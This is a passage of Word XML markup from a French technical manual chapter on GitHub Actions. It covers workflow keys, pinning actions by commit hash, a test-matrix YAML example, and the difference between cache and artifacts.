            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Événements et filtres</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="249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permissions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="332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Droits du jeton</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Principe du moindre privilège</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2496"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>runs-on</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3328"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Type de runner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Version explicite</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="249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steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="332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Étapes séquentielles</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Une étape = une responsabilité</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2496"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>needs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3328"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Dépendances entre tâches</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Ordonnancement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="249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if</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="332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Condition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Évite les étapes inutiles</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2496"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>concurrency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3328"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>File d'exécution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Annule les obsolètes</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ÉPINGLEZ LES ACTIONS PAR VERSION</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>@v4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> désigne une étiquette mobile ; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>@main</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> désigne une branche. Pour un environnement critique, épinglez par empreinte de commit : une action compromise ne peut alors pas modifier votre pipeline.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une empreinte de commit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Épinglage fort</w:t>
        <w:br/>
        <w:t>- uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v4.1.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>79.2 Tâches parallèles et matrice</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une matrice exécute la même tâche pour plusieurs combinaisons de paramètres. C'est le moyen le plus court de tester plusieurs versions d'un langage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une matrice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jobs:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  test:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    strategy:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      fail-fast: false</w:t>
        <w:br/>
        <w:t xml:space="preserve">      matrix:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        node: [20, 22]</w:t>
        <w:br/>
        <w:t xml:space="preserve">        os: [ubuntu-24.04]</w:t>
        <w:br/>
        <w:t xml:space="preserve">        include:</w:t>
        <w:br/>
        <w:t xml:space="preserve">          - node: 22</w:t>
        <w:br/>
        <w:t xml:space="preserve">            os: windows-2025</w:t>
        <w:br/>
        <w:t xml:space="preserve">    runs-on: ${{ matrix.os }}</w:t>
        <w:br/>
        <w:t xml:space="preserve">    continue-on-error: ${{ matrix.node == 20 }}</w:t>
        <w:br/>
        <w:t xml:space="preserve">    steps:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - uses: actions/checkout@v4</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - uses: actions/setup-node@v4</w:t>
        <w:br/>
        <w:t xml:space="preserve">        with:</w:t>
        <w:br/>
        <w:t xml:space="preserve">          node-version: ${{ matrix.node }}</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - run: npm ci</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - run: npm test</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.299 — Cinq réglages de matrice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19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Option</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="332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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="249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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>fail-fast: false</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3328"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Toutes les combinaisons vont au bout</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2496"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Diagnostic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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continue-on-error</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="332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Échec non bloquant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="249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Version expérimentale</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>include</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3328"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Ajoute une combinaison</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2496"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Cas particuliers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>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exclude</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="332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Retire une combinaison</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="249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Version incompatible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>max-parallel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3328"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Limite la concurrence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2496"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Quota de runners</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>79.3 Cache et artefacts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le cache accélère ; l'artefact transporte. Les deux sont souvent confondus, alors qu'ils n'ont ni la même durée de vie ni la même garantie.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.300 — Cinq différences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Aspect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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Cache</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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Artefact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2719"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>But</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3148"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Réutiliser des dépendances</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3148"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Transmettre un résultat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="271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Durée de vie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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Quelques jours</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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Définie explicitement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2719"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Garantie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3148"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Peut être absent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3148"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Doit être présent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="271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Partage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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Par clé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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Par nom et exécution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2719"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
